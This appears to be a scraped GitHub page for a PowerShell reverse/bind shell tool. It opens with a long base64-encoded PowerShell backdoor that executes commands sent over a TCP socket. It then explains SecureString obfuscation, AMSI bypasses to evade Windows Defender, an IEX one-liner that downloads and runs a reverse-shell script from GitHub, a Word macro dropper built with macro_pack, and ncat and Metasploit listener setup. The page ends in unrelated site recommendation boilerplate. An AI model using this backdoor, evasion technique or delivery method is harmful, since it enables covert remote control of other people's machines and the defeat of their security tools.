AHQAbwByAHkAIABhAHQAIABnAGkAdABoAHUAYgAuAGMAbwBtAC8AaQB2AGEAbgAtAHMAaQBuAGMAZQBrAC8AcABvAHcAZQByAHMAaABlAGwAbAAtAHIAZQB2AGUAcgBzAGUALQB0AGMAcAAuACAAIAAjAGAAbgAjACAARgBlAGUAbAAgAGYAcgBlAGUAIAB0AG8AIABkAG8AbgBhAHQAZQAgAGIAaQB0AGMAbwBpAG4AIABhAHQAIAAxAEIAcgBaAE0ANgBUADcARwA5AFIATgA4AHYAYgBhAGIAbgBmAFgAdQA0AE0ANgBMAHAAZwB6AHQAcQA2AFkAMQA0AC4AIAAgACAAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACIAOwAgACQAbAAgAD0AIAAkAGMAIAA9ACAAJABzACAAPQAgACQAYgAgAD0AIAAkAHcAIAA9ACAAJABkACAAPQAgACQAcgAgAD0AIAAkAG4AdQBsAGwAOwAgAHQAcgB5ACAAewAgACQAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgAIgAwAC4AMAAuADAALgAwACIALAAgACQAcAApADsAIAAkAGwALgBTAHQAYQByAHQAKAApADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBCAGEAYwBrAGQAbwBvAHIAIABpAHMAIAB1AHAAIABhAG4AZAAgAHIAdQBuAG4AaQBuAGcALgAuAC4AYABuAGAAbgBXAGEAaQB0AGkAbgBnACAAZgBvAHIAIABjAGwAaQBlAG4AdAAgAHQAbwAgAGMAbwBuAG4AZQBjAHQALgAuAC4AYABuACIAOwAgAGQAbwAgAHsAIABpAGYAIAAoACQAbAAuAFAAZQBuAGQAaQBuAGcAKAApACkAIAB7ACAAJABjACAAPQAgACQAbAAuAEEAYwBjAGUAcAB0AFQAYwBwAEMAbABpAGUAbgB0ACgAKQA7ACAAfQAgAGUAbABzAGUAIAB7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADUAMAAwADsAIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABjACAALQBlAHEAIAAkAG4AdQBsAGwAKQA7ACAAJABsAC4AUwB0AG8AcAAoACkAOwAgACQAcwAgAD0AIAAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAgACQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAIAAkAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwA7ACAAJAB3ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwAsACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALAAgADEAMAAyADQAKQA7ACAAJAB3AC4AQQB1AHQAbwBGAGwAdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBDAGwAaQBlAG4AdAAgAGgAYQBzACAAYwBvAG4AbgBlAGMAdABlAGQAIQBgAG4AIgA7ACAAJABiAHkAIAA9ACAAMAA7ACAAZABvACAAewAgACQAdwAuAFcAcgBpAHQAZQAoACIAUABTAD4AIgApADsAIABkAG8AIAB7ACAAJABiAHkAIAA9ACAAJABzAC4AUgBlAGEAZAAoACQAYgAsACAAMAAsACAAJABiAC4ATABlAG4AZwB0AGgAKQA7ACAAaQBmACAAKAAkAGIAeQAgAC0AZwB0ACAAMAApACAAewAgACQAZAAgACsAPQAgACQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAIAAwACwAIAAkAGIAeQApADsAIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABzAC4ARABhAHQAYQBBAHYAYQBpAGwAYQBiAGwAZQApADsAIABpAGYAIAAoACQAYgB5ACAALQBnAHQAIAAwACkAIAB7ACAAJABkACAAPQAgACQAZAAuAFQAcgBpAG0AKAApADsAIABpAGYAIAAoACQAZAAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAdAByAHkAIAB7ACAAJAByACAAPQAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AQwBvAG0AbQBhAG4AZAAgACQAZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAIAAkAHIAIAA9ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4AIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwA7ACAAfQAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAZAAiADsAIABpAGYAIAAoACQAcgAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAJAB3AC4AVwByAGkAdABlACgAJAByACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAcgAiADsAIAB9ACAAfQAgAH0AIAB9ACAAdwBoAGkAbABlACAAKAAkAGIAeQAgAC0AZwB0ACAAMAApADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBDAGwAaQBlAG4AdAAgAGgAYQBzACAAZABpAHMAYwBvAG4AbgBlAGMAdABlAGQAIQAiADsAIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAEkAbgBuAGUAcgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwAgAH0AIABmAGkAbgBhAGwAbAB5ACAAewAgAGkAZgAgACgAJABsACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGwALgBTAGUAcgB2AGUAcgAuAEMAbABvAHMAZQAoACkAOwAgACQAbAAuAFMAZQByAHYAZQByAC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAbAAiADsAIAB9ACAAaQBmACAAKAAkAHcAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAdwAuAEMAbABvAHMAZQAoACkAOwAgACQAdwAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHcAIgA7ACAAfQAgAGkAZgAgACgAJABzACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAHMALgBDAGwAbwBzAGUAKAApADsAIAAkAHMALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBzACIAOwAgAH0AIABpAGYAIAAoACQAYwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABjAC4AQwBsAG8AcwBlACgAKQA7ACAAJABjAC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAYwAiADsAIAB9ACAAaQBmACAAKAAkAGIAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAYgAuAEMAbABlAGEAcgAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAYgAiADsAIAB9ACAAaQBmACAAKAAkAHIAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAcgAiADsAIAB9ACAAaQBmACAAKAAkAGQAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAZAAiADsAIAB9ACAAWwBHAEMAXQA6ADoAQwBvAGwAbABlAGMAdAAoACkAOwAgAH0AIAB9ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBwACIAOwA=

The encoded script will prompt for input. See the slightly altered script here - used the minified script to reduce the command length.

SecureString

To generate a PowerShell SecureString from a PowerShell script, run the following PowerShell command (the string can get very long):

ConvertFrom-SecureString -k (0..15) (ConvertTo-SecureString (Get-Content -Path $script -Raw) -AsPlainText -Force)

To decode and run a PowerShell SecureString, run the following PowerShell command:

IEX((New-Object System.Net.NetworkCredential("", (ConvertTo-SecureString -k (0..15) $string))).Password)

Most security products will flag a PowerShell script as malicious if the script uses & symbol excessively.

Check the manually obfuscated and transformed reverse shell script here.

Check the manually obfuscated and transformed bind shell script here.

AMSI Bypass

If Windows Defender is blocking your PowerShell script or encoded command execution, generate an AMSI bypass code from AMSI.fail and run it in your PowerShell session. Credits to the author!

After running the AMSI bypass code, you can download the content of your PowerShell script from the web using this one-liner:

IEX([System.IO.StreamReader]::New([System.Net.WebRequest]::Create('https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/prompt/minified/powershell_reverse_tcp_prompt_mini.ps1').GetResponse().GetResponseStream()).ReadToEnd());

Find out more about AMSI bypass at S3cur3Th1sSh1t/Amsi-Bypass-Powershell. Credits to the author!

MS Word Integration

To embed a PowerShell script into an MS Word document, check macro_pack tool. Credits to the author!

Run the following command from either PowerShell or Command Prompt:

echo "https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

Images

Backdoor

Figure 1 - Backdoor

Listener

Figure 2 - Listener

simplepower-reverseshell's People

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.